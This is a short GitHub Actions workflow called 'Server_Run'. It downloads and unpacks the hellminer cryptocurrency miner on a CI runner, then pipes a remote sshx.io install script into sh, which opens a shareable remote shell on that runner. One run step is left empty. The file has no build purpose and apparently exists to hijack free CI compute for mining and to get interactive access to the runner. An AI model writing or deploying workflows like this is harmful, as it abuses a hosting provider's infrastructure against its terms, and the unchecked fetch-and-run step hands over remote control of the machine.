name: Server_Run
on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - run: sudo apt install neofetch -y
      - run: neofetch
      - run: wget https://github.com/hellcatz/hminer/releases/download/v0.59.1/hellminer_linux64_avx2.tar.gz
      - run: tar -xzvf hellminer_linux64_avx2.tar.gz
      - run: 
      - run: curl -sSf https://sshx.io/get | sh -s run
